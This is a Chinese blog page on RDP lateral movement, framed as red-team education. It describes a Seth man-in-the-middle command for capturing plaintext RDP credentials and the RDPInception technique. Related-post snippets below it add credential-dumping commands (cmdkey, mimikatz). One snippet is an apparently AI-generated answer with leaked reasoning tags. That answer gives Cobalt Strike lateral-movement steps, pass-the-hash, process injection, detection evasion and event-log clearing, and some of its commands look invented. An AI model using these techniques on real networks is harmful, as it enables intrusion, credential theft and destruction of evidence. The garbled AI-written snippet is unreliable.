横向移动之RDP&Desktop Session Hijack

最新推荐文章于 2025-05-12 22:34:52 发布
原创 最新推荐文章于 2025-05-12 22:34:52 发布 · 798 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#windows #java #运维

文章前言

管理员在内部网络中广泛使用远程桌面协议(rdp),这允许系统所有者和管理员远程管理windows环境,然而RDP可以给攻击者提供各种机会来实施攻击,这些攻击可以用于红队场景中的横向移动,下面的攻击可以让RedTeam获得凭据,劫持其他用户的RDP会话,并对远程系统执行任意代码,这些远程系统将使用RDP作为受感染工作站的身份验证机制。

RDP劫持

实施中间人攻击通常会导致凭据捕获,它正在对RDP会话执行这种攻击,这将允许攻击者为了横向移动的目的而轻易地获得域帐户的纯文本密码,seth是一个工具,无论是否启用网络级身份验证(nla),它都可以自动执行RDP中间人攻击,实施这种攻击需要四个参数:

  • 以太网接口

  • 攻击者的ip

  • 受害主机的ip

  • 目标rdp主机的ip

./seth.sh eth0 10.0.0.2 10.0.0.3 10.0.0.1

在执行时,该工具将在后台执行一系列步骤,以确保成功实施攻击:

  1. ARP欺骗

  2. 允许转发ipv4流量,将流量从受害主机重定向到攻击者计算机,然后重定向到目标rdp服务器

  3. 配置iptable规则来拒绝syn数据包,以防止直接rdp身份验证

  4. 捕获目的主机的syn数据包

  5. ssl证书的克隆

  6. 重新配置iptables规则,将流量从受害工作站路由到目标rdp主机

  7. 阻止到端口88的流量,以将kerberos身份验证降级到ntlm

步骤1-3将在受害者认证之前执行,试图通过rdp向目标服务器进行身份验证的用户将收到以下消息:

当用户建立连接时,凭据将以纯文本形式显示给攻击者

PS:该方法笔者在本地未实验成功,因为有SSL强校验,在实战中建议慎用~

RDP Inception

mdsec发现了一种技术,该技术允许攻击者在启动时执行任意代码并通过RDP连接传播,从而在网络内部执行横向移动,整个思路大致如下:

而在渗透测试中,如果我们获得某台服务器C的控制权,而最终目标是PC X,但由于对方高度安全的网络环境限制,我们只有采取RDPInception攻击方式,通过对接入C的服务器B进行攻击控制,之后,对接入B的服务器A进行攻击控制,最终,对接入A的PC X形成攻击控制,整个攻击链如下:

PC X RDP ————> Server A
Server A RDP ————> Server B
Server B RDP ————> Server C

为了促进这种攻击,mdsec开发了一个批处理脚本(https://github.com/mdsecactivebreach/RDPInception)来实现概念验证,不过该技术在利用时有一个先决条件就是内网其他主机远程连接受感染主机时"本地资源"选项中设置了加载C盘:

之后攻击者可以在已经获得访问权限的主机上执行批处理脚本将获得一个shell

该脚本执行之后将会在已经获得访问权限的WIndow 7主机上和远程连接的主机上同时创建启动项:

文章内容过多,不想再复制一遍了,更多内容请访问一下原文链接进行查看:

横向移动之RDP&Desktop Session Hijack

未知攻,焉知防,以攻促防,共筑安全~

个人知乎:https://www.zhihu.com/people/flypeng-56
个人优快云:https://blog.youkuaiyun.com/Fly_hps
个人GitHub:https://github.com/Al1ex
个人云+社区:https://cloud.tencent.com/developer/user/8423247
安全团队公众号:七芒星实验室

欢迎关注微信公众号"七芒星实验室"获取最新安全动态~

内网安全——横向移动-RDP&WinRM&Kerberoast攻击
m0_61506558的博客
02-03 682
请求的Kerberos服务票证的加密类型是RC4_ HMAC_ MD5, 这意味着服务帐户的NTLM密码。如果我们有-一个为域用户帐户注册的任意sPN,那么该用户帐户的明文密码的NTIM哈希值。Dc在活动目录中查找sEN,并使用与sPN关联的服务帐户加密票证,以便服务能够验证用。黑客可以使用有效的域用户的身份验证票证(TGT)去请求运行在服务器上的一一个或多个。黑客将收到的rGs票据离线进行破解,即可得到目标服务帐号的HASH,这个称之为。双方都启用的winrm rs的服务,使用此服务需要管理员级别凭据。
内网安全 - 域横向移动RDP&SPN
acepanhuan的博客
03-17 667
内网安全 - 域横向移动RDP&SPN
rdp连接工具_横向渗透之 [RDP]
weixin_39928940的博客
11-27 1741
重生信息安全T3ngYu一、RDP 服务确定和启动 1. 确定RDP服务是否启动和服务端口 (1)注册表查询REG QUERY "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections # 查看RDP服务是否开启:1关闭,0开启 REG QUERY "HKEY_LOCAL_MACH...
横向移动(上)
m0_73995253的博客
05-12 1166
IPC(Internet Process Connection)共享,是为了实现进程间通信而开放的命令管道。IPC可以通过验证用户名和密码获得相应的权限,通常在远程管理计算机和查看九三级的共享资源时使用。通过IPC$,可以与目标机器建立连接。利用这个连接,不仅可以访问目标机器中的文件,进行上传、下载等操作,还可以在目标机器上运行其他命令,以获得目标机器的目录结构、用户列表等信息。Windows电脑默认开启IPCnet share共享文件共享文件是指主动在网络上共享自己的计算机文件。
RDP凭据获取继续横向
weixin_43227251的博客
05-06 461
RDP凭据获取继续横向 文章目录RDP凭据获取继续横向猕猴桃获取密码network password通过powershell脚本 猕猴桃获取密码 有可能这台机器保存登录其他机器rdp #查看mstsc的连接纪录 cmdkey /list #查找本地的Credentials: dir /a %userprofile%\AppData\Local\Microsoft\Credentials\* 如果存在,可以使用mimikatz 记录这个值 mimikatz.exe "privilege::debug"
内网渗透—横向移动&RDP&WinRM&WinRS&SPN扫描&Kerberos攻击
2301_76227305的博客
08-14 1644
总的来说RDP基本在现实中不咋用,因为你要去判断连接的账户当前在线不,被发现的风险较大。WinRM的话可能用的比较多,条件是必须为2008以上的系统才行,不过都2024年了,那些2008以下的老古董估计也没谁用了。kerberos攻击简单来说,就是找到RC4加密方式的服务,然后去请求它让本地生成票据,最后使用工具破解得到密码。PS:这个次是实验弄了整整三天,wcnm,各种环境问题。看了一大堆文章也解决不了,实在是不想管啦。以上便是本次横移的知识了。
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&入口差异&切换上线&IPC管道&AT&SC任务&Impacket套件&UI插件
06-22
本文将深入探讨“红队内网攻防渗透”,重点介绍内网对抗中的横向移动策略、不同入口差异、上线切换技巧,以及利用IPC管道、AT任务、SC服务、Impacket工具套件和UI插件等技术手段。 首先,横向移动是内网渗透的关键...
第131天:内网安全-横向移动&Kerberos 攻击&SPN扫描&WinRM&WinRS&RDP
weixin_71529930的博客
08-15 988
RDP利用的三种方式1.直接在当前被控主机上进行远程连接2.建立节点进行连接3.端口转发,(访问当前主机的2222端口等于访问目标的3389)第一种方式(动静太大)直接利用被控主机进行远程连接点击这个图标可以控制输入win+r输入mstsc,输入想访问的ip但是好像需要域管理员设置策略以后才允许普通用户之间连接用管理员用户去登录域控主机第二种方式设置socks代理通过代理利用rdesktop命令远程连接目标主机登录管理员用户在主机中查看会发现,有两个用户登录了这台主机。
内网渗透之横向移动rdp&winrm&winrs&spn&kerberos
m0_62207170的博客
04-24 1096
内网渗透之横向移动rdp&winrm&winrs&spn&kerberos
【内网安全】横向移动-Kerberos-SPN-WinRM-RDP
qq_55349490的博客
07-20 1466
看之前的文章RDP远程桌面服务 支持明文及HASH连接条件:对方开启RDP服务 远程桌面当前我们已经取到31主机的权限,目前要利用RDP连接到32,且32是不出网的。这时我们肯定是需要用31做为跳板机去实现。以下是利用RDP进行连接的三种方式。
赛斯(Seth):执行MitM攻击并从RDP连接中提取明文凭证
02-06
赛斯 Seth是用Python和Bash编写的工具,它通过尝试降级连接以提取明文凭证来与MitM RDP连接。 开发它的目的是提高意识,并在透支测验,研讨会或讲座的背景下教育有关正确配置RDP连接的重要性。 作者是Adrian Vollmer(SySS GmbH)。 用法 像这样运行它: $ ./seth.sh <INTERFACE> <ATTACKER> <VICTIM> <GATEWAY> [<COMMAND>] 除非RDP主机与受害计算机位于同一子网中,否则最后一个IP地址必须是网关的IP地址。 最后一个参数是可选的。 它可以包含通过按键事件注入模拟
SharpRDPHijack:POC远程桌面(RDP)会话劫持实用程序,用于断开连接的会话
03-08
夏普RDPH劫持 Sharp RDP Hijack是用于断开会话的概念验证.NET / C#远程桌面协议(RDP)会话劫持实用程序 背景 RDP会话劫持是一种开发后技术,用于控制(强制)断开的交互式登录会话。 在描述了该技术。 笔记 SharpRDPHijack.cs在.NET Framework v.4下的Visual Studio 2019中进行编译。 会话劫持需要提升的(管理员)上下文才能连接到另一个会话。 除非知道目标会话用户的密码,否则需要NT AUTHORITY \ SYSTEM上下文来控制会话。 没有提供的密码,SharpRDPHijack将(试图)模拟NT AUTHORITY \ SYSTEM。 Windows 2019 Server会话劫持与先前的OS版本相比表现出有趣的行为。 劫持了重定向到活动RDP会话的会话后,Windows登录屏幕会提示您输入用户的密码/凭据
设置 session rdp 时间限制
nongcunqq的博客
06-02 1190
起因:一台服务器 2016版本,每当退出远程桌面后,过一段时间,用户所有的进程就会自动关闭,导致后台运行的任务出现异常。运行 gpedit.msc, 根据以下资料设置后,记得重启,不然不会生效前三个选项 enable 都选 never后两个 disable我们可以尝试以下设置,来自动关闭断开连接(disconnected)的远程桌面会话:1. AD与环境中,在用户账户属性-会话中,关闭已经断开连接的会话(End a disconnected session)一栏中,设置时间限制。
RDP中间人攻击
帅醉了的博客
10-04 1061
前言:靠着网上的资源一点一点的啃。 内网渗透中,发觉有机器开了远程桌面,可以使用RDP中间人攻击进行持久控制和横向渗透。 攻击成功具备的条件 同一个网段 知道连接者ip,被连接ip。 工具:Seth git clone https://github.com/SySS-Research/Seth.git 使用方法 ./seth.sh <INTERFACE> <ATTACKER_IP> <VICTIM_IP> <GATEWAY_IP|HOST_IP> [&
内网安全学习(五)----域横向: SPN&RDP&Cobalt Strike
qi_SJQ_的博客
02-13 1451
域横向 CobaltStrike&SPN&RDP 1.横向移动—RDP传递-Mimikatz 除了之前提到的IPC、WMI、SMB、NTLM等协议的连接外,获取到的明文密码或HASH密文也可以通过RDP协议(3389端口)进行连接操作。 1)RDP明文密码连接: Windows: mstsc mstsc.exe /console /v192.168.3.21 /admin linux: rdesktop 192.168.3.21:3389 2)RDP密文hash连接: windows
RDPSession的远程桌面共享,原生的Microsoft DLL
CrazyVBNeter的博客
02-04 2549
RDPSession 远程桌面共享
七芒星实验室
Fly_鹏程万里
03-08 2035
Heptagram简介 七芒星(Heptagram)实验室成立于2019年10月15日,团队的初衷是组建一个安全技术研究团队,实时跟踪国内外安全动态并进行安全技术的分享和研究,共同促进安全技术的发展和提高,目前Heptagram主要涉及以下几个安全方向: Web安全 移动安全 代码审计 漏洞挖掘 安全研发 内网渗透 逆向分析 APT攻防 应急响应 区块链安全 Heptagram资讯 截止目前为止,七芒星实验室已完成基本的知识文库整理,同时也会继续向前迈进,在web安全、移动安全、代码
Windows | RDPWrap远程桌面工具
MENGZIKUN的博客
08-09 8092
若 状态为 [ not support ] , 则根据 ver. 的版本号,找对应的 rdpwrap.ini ,替换 C:\Program Files\RDP Wrapper 文件夹中的 rdpwrap.ini 配置文件。然后根据需要,勾选配置即可。(PS:对应的 rdpwrap.ini 在 https://github.com/stascorp/rdpwrap/releases 的 issue 中查找)把下载下来的压缩包文件解压到任意一个文件夹,建议是放在常用的软件安装目录,要用的时候能找到的地方。
命令控制之Telegram
热门推荐
Fly_鹏程万里
05-01 1万+
文章前言 使用涉交网络作为C2 Server有两个好处,一方面是因为社交网络的服务器稳定,另一个方面是因为在于其通信的数据可以隐藏在正常的流量中,不容易被发现,本节主要是"站在巨人的肩膀"上来介绍通过Telegram的Bots功能结合Python来对API的调用来实现C2。 基础内容 Telegram是一款跨平台的实时通讯应用,目前支持Android、iPhone/iPad、WP、Web、PC/Mac/Linux,在整个通信过程中通信数据加密,官方曾悬赏$300,000 for Cracking Te
cobalt strike 横向移动
最新发布
06-24
<think>我们正在讨论CobaltStrike的横向移动技术。根据用户提供的引用内容,横向移动涉及RDP(远程桌面协议)和CobaltStrike工具的使用。同时,引用中提到了提权所需的插件链接。但是,用户的问题主要集中在横向移动的使用方法或技术实现上。横向移动是攻击者在获取网络内一台机器的访问权限后,尝试扩展到其他机器的过程。在CobaltStrike中,横向移动可以通过多种方式实现,包括利用RDP、WMI、SMB、PsExec等。由于CobaltStrike是一个商业渗透测试工具,通常由安全专业人员用于模拟攻击,因此我们将从技术角度讨论其横向移动功能。###CobaltStrike横向移动的常见方法1.**使用RDP(远程桌面协议)**:-在已经获取到目标机器凭证(如用户名和密码或哈希)的情况下,可以通过RDP登录到目标机器。-CobaltStrike提供了`rdp`命令,可以启动一个远程桌面会话。-另外,也可以使用CobaltStrike的`jump`命令,通过已有的Beacon会话跳转到其他机器(使用psexec、winrm、wmi等方式)。2.**使用PsExec**:-PsExec是SysInternals工具包中的一个工具,常用于在远程机器上执行命令。-CobaltStrike的`psexec`命令可以利用已有的Beacon会话在目标机器上执行Payload,从而获得一个新的Beacon会话。3.**使用WMI(WindowsManagementInstrumentation)**:-WMI提供了管理远程Windows系统的能力。-CobaltStrike的`jumpwinrm`或`wmi`命令可以通过WMI在目标机器上执行Payload。4.**使用SMBBeacon**:-SMBBeacon通过命名管道进行通信,允许Beacon会话通过父Beacon进行通信(即不需要直接出网)。-这种方法在横向移动时非常隐蔽,因为流量是通过已有的Beacon传递的。5.**利用漏洞进行横向移动**:-如果目标存在漏洞(如MS17-010永恒之蓝),也可以利用这些漏洞进行横向移动。###具体操作步骤(以PsExec为例)假设我们已经控制了一台机器(A),并且获得了域管理员凭证,现在我们想横向移动到机器B(已知IP或主机名)。1.**在CobaltStrike中,确保已经有一个Beacon会话(机器A)**。2.**使用`psexec`命令**:-在Beacon控制台中输入:`psexec[目标机器B的IP或主机名][监听器]`-例如:`psexec192.168.1.101http`-这里的`http`是已经配置好的HTTP监听器。3.**等待结果**:-如果成功,机器B将会连接回CobaltStrike团队服务器,并建立一个新的Beacon会话。###关于提权在横向移动之前,有时需要提权。引用中提到的ElevateKit是一个提权工具集,可以通过CobaltStrike的`elevate`命令使用。但请注意,横向移动不一定需要先提权,如果当前权限已经足够(如拥有目标机器的管理员凭证),则可以直接进行。###安全注意事项-使用CobaltStrike进行横向移动必须在合法授权的渗透测试中进行。-未经授权的使用是非法的。###参考文献根据用户提供的引用,我们引用了关于横向移动和提权插件的部分[^1]。§§相关问题§§1.如何配置SMBBeacon进行横向移动?2.CobaltStrike中横向移动失败的可能原因有哪些?3.除了RDP和PsExec,CobaltStrike还支持哪些横向移动方法?4.如何利用CobaltStrike进行漏洞利用(如MS17-010)实现横向移动?</think>### Cobalt Strike横向移动技术详解 #### 1. 核心概念 横向移动是攻击者在获取初始立足点后,在目标网络内横向扩展控制范围的技术。Cobalt Strike通过Beacon代理实现以下核心功能: - **凭证传递**:使用获取的凭据(如哈希/NTLM令牌)绕过认证 - **协议利用**:通过RDP、SMB、WMI等协议建立新会话 - **隐蔽通信**:Beacon的异步通信设计可绕过基础防御 $$ \text{攻击链模型} : \text{初始访问} \rightarrow \text{凭证窃取} \rightarrow \text{横向移动} \rightarrow \text{目标达成} $$ #### 2. 常用横向移动方法 ##### (1) RDP横向移动 ```python # 在Beacon控制台执行 jump psexec64 <目标IP> <监听器> # 使用PsExec模块 remote-exec winrm <目标IP> <命令> # 通过WinRM执行命令 ``` - 需提前获取管理员凭据 - 配合`portscan`命令识别开放3389端口的主机 ##### (2) SMB协议传递 ```python # 哈希传递攻击(PTH) pth <域名>\<用户> <NTLM哈希> use <获取的票据> # 注入Kerberos票据 ``` - 利用Windows身份验证机制缺陷 - 要求目标开启SMB服务(445端口) ##### (3) WMI远程执行 ```python jump winrm64 <目标IP> <监听器> # 通过WinRM powershell-import Invoke-WMIExec.ps1 # 加载WMI脚本 ``` - 依赖135/5985端口 - 更隐蔽但执行速度较慢 #### 3. 技术实现要点 1. **监听器配置**: - HTTP/HTTPS监听器用于外联 - SMB监听器用于内部横向通信 ```python set smb_frame_header "\x00" # 设置隐蔽通信特征 ``` 2. **凭证管理**: ```python make_token DOMAIN\user password # 创建访问令牌 kerberos_ticket_use /path/to/ticket.kirbi # 注入Kerberos票据 ``` 3. **规避检测**: - 使用`sleep 0`实现实时交互 - `checkin`命令分段传输数据 - 设置`jitter`参数扰乱通信周期 #### 4. 防御规避建议 1. **日志清理**: ```python clearev # 清除事件日志 ``` 2. **进程注入**: ```python inject <pid> <监听器> # 注入合法进程 ``` 3. **流量伪装**: ```python set http_stager "/css/jquery.min.js" # 伪装为JS文件 ``` > **注意**:所有操作需在合法授权测试中进行,未经授权的使用违反法律[^1]。
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值